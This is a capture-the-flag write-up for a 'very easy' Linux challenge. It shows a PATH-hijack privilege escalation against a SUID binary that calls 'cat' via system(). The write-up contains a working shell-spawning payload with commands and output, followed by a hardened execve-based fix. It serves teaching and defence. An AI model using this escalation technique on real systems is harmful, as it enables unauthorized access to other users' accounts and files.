Writeup - Einstein
Difficulty : very easy
Statement
- The laws of physics are the same for all observers in any inertial frame of reference relative to one another (principle of relativity).
- The speed of light in vacuum is the same for all observers, regardless of their relative motion or of the motion of the light source.
Source : https://en.wikipedia.org/wiki/Theory_of_relativity
Credentials : user:password
Deploy on deploy.heroctf.fr
Format : Hero{flag}
Author : Log_s
Solve
We notice a SUID bit on the learn binary. The SUID (Set User ID) permission in Unix/Linux is a special file permission used mainly for executable files. When the SUID bit is set on an executable file, it allows users to execute the file with the permissions of the file’s owner rather than with the permissions of the user running it.
user@einstein:~$ ls -al
total 44
drwx------ 1 user user 4096 Oct 25 17:37 .
drwxr-xr-x 1 root root 4096 Oct 25 17:37 ..
lrwxrwxrwx 1 root root 9 Oct 25 17:37 .bash_history -> /dev/null
-rw-r--r-- 1 user user 220 Oct 25 17:37 .bash_logout
-rw-r--r-- 1 user user 3526 Oct 25 17:37 .bashrc
-rw-r--r-- 1 user user 807 Oct 25 17:37 .profile
-rwsr-sr-x 1 einstein einstein 16160 Oct 25 17:37 learn
-rw-r--r-- 1 einstein einstein 679 Oct 25 17:35 learn.c
Let’s look at its source code:
user@einstein:~$ cat learn.c
#include <stdio.h>
#include <unistd.h>

int main() {
    // Welcome message
    printf("Welcome to this physics course! All information on this course is not copied from the internet without fact check and is completely riginal.\n");
    printf("\n===================================\n\n");

    // Execute cat command
    setreuid(geteuid(), geteuid()); // Because system() runs sh that resets euid to uid if they don't match
    // Otherwise we could not read /home/einstein/theory.txt
    char command[30] = "cat /home/einstein/theory.txt";
    if (system(command) == -1) {
        perror("system");
        return 1;
    }
    return 0;
}
We can see that the cat command is called by name, without an absolute path, so the shell started by system() looks it up through PATH, which we control. The goal is to write a piece of C code that gives us a shell with the rights of the user einstein.
echo '#include <stdlib.h>
#include <unistd.h>

void get_shell() {
    setreuid(geteuid(), geteuid());
    system("/bin/bash -p");
}

int main() {
    get_shell();
    return 0;
}' > cat.c
We name the binary cat and modify our PATH so that our cat binary is found before the legitimate one.
user@einstein:~$ gcc cat.c -o /tmp/cat
user@einstein:~$ export PATH=/tmp:$PATH
We launch the binary and get our shell:
user@einstein:~$ ./learn
Welcome to this physics course! All information on this course is not copied from the internet without fact check and is completely riginal.
===================================
bash: /home/user/.bashrc: Permission denied
einstein@einstein:~$ id
uid=1001(einstein) gid=1000(user) groups=1000(user),100(users)
user@einstein:~$ /bin/cat /home/einstein/flag.txt
Hero{th30ry_of_r3l4tiv3_p4th5}
Flag : Hero{th30ry_of_r3l4tiv3_p4th5}
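
The hijack works because system() passes the string to sh, which resolves cat through the caller's PATH. The following is an added example, not part of the challenge or the original writeup: a hardened variant of the cat call in learn.c that executes /bin/cat by absolute path with a fixed environment. The function name run_cat and the environment values are assumptions chosen for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Run /bin/cat on `path` without any PATH lookup.
 * Returns cat's exit status, or -1 if the child could not be run. */
int run_cat(const char *path) {
    /* argv[0] is only a label; the program is chosen by execve()'s first argument. */
    char *const argv[] = { "cat", (char *)path, NULL };
    /* Fixed environment: nothing from the caller (PATH, LD_*, IFS) is inherited. */
    char *const envp[] = { "PATH=/usr/bin:/bin", "LC_ALL=C", NULL };

    fflush(stdout);                 /* keep parent output ordered before the child's */
    pid_t pid = fork();
    if (pid == -1)
        return -1;
    if (pid == 0) {
        /* Absolute path: execve() never consults PATH, and no shell is involved. */
        execve("/bin/cat", argv, envp);
        _exit(127);                 /* only reached if execve() failed */
    }
    int status;
    if (waitpid(pid, &status, 0) == -1 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void) {
    printf("Welcome to this physics course!\n");
    printf("\n===================================\n\n");
    /* No setreuid() is needed here: there is no intermediate sh to reset the
     * effective UID, so the SUID-granted euid is kept across execve(). */
    return run_cat("/home/einstein/theory.txt") == 0 ? 0 : 1;
}
```

With this version, prepending /tmp to PATH has no effect on which binary runs.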